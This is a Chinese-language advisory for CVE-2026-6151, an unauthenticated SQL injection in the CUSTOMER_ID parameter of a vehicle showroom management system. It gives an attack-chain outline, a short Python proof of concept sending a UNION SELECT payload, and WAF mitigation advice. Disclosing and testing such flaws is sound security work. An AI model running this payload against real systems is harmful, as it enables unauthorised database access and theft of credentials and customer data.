CVE-2026-6151: Vehicle Showroom管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-6151

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Vehicle Showroom Management System

漏洞概述

code-projects Vehicle Showroom Management System 1.0版本中存在严重的SQL注入漏洞。该漏洞位于/util/PaymentStatusFunction.php文件中，由于未对用户输入的CUSTOMER_ID参数进行严格的过滤和验证，导致攻击者可以通过构造恶意的SQL语句来执行非授权的数据库查询。利用此漏洞无需身份验证，攻击者可远程发起攻击。由于系统未对输入进行安全处理，可能导致敏感信息泄露、数据篡改或服务中断。鉴于该漏洞利用代码已公开，风险等级较高，建议管理员尽快排查并修复。

技术细节

该漏洞的根源在于应用程序在处理数据库查询时采用了不安全的字符串拼接方式。在/util/PaymentStatusFunction.php文件中，代码直接获取HTTP请求中的CUSTOMER_ID参数，并将其嵌入到SQL查询语句中，而没有使用预编译语句（Prepared Statements）或进行有效的输入过滤。这种设计缺陷使得参数中的特殊字符（如单引号、注释符等）被数据库引擎解析为SQL指令的一部分。
攻击者无需任何用户交互或身份认证即可利用此漏洞。通过向目标服务器发送特制的HTTP请求，并在CUSTOMER_ID参数中注入恶意SQL载荷，攻击者可以改变查询逻辑。常见的利用方式包括基于布尔值的盲注、基于时间的盲注或联合查询注入。由于该接口直接与数据库交互，攻击者可能成功读取数据库结构、窃取包含用户密码哈希或其他敏感信息的数据，严重威胁系统的机密性、完整性和可用性。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统运行的是Vehicle Showroom Management System 1.0，并定位到/util/PaymentStatusFunction.php接口。

STEP 2

构造载荷

攻击者针对CUSTOMER_ID参数构造SQL注入Payload，例如使用UNION SELECT语句试图提取数据库敏感信息。

STEP 3

发送请求

攻击者向目标服务器发送包含恶意Payload的HTTP GET或POST请求，无需登录认证即可访问。

STEP 4

执行注入

后端数据库接收到未经过滤的参数，直接执行攻击者注入的恶意SQL命令。

STEP 5

获取数据

攻击者根据数据库返回的结果，提取用户数据、管理员凭证或其他敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(target_url):
    # Target endpoint vulnerable to SQL Injection
    full_url = f"{target_url}/util/PaymentStatusFunction.php"
    
    # Payload to test SQL Injection (e.g., extracting database version)
    # Using a simple logical check or union select based injection
    payload = "1' UNION SELECT NULL, version(), NULL-- -"
    
    params = {
        "CUSTOMER_ID": payload
    }
    
    try:
        response = requests.get(full_url, params=params, timeout=10)
        if response.status_code == 200:
            # Analyze response to confirm vulnerability
            print(f"[+] Request sent to {full_url}")
            print(f"[+] Payload: CUSTOMER_ID={payload}")
            print(f"[+] Response Length: {len(response.text)}")
            print(f"[+] Response Content:\n{response.text}")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target IP or domain
    target = "http://localhost/showroom"
    check_sqli(target)

影响范围

Vehicle Showroom Management System 1.0

防御指南

临时缓解措施

建议在Web应用防火墙（WAF）中添加规则，拦截针对PaymentStatusFunction.php的异常请求，特别是包含SQL关键字（如UNION, SELECT, OR, '）的流量。如果业务允许，可临时禁用或限制对该文件的公网访问，直到完成代码修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6151
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6151
3 Details https://www.cvedetails.com/cve/CVE-2026-6151/
4 VulDB https://vuldb.com/cve/CVE-2026-6151
5 Link https://code-projects.org/
6 Link https://github.com/zheng-lv/CVE-/issues/2
7 Link https://vuldb.com/submit/796311
8 Link https://vuldb.com/vuln/357031
9 Link https://vuldb.com/vuln/357031/cti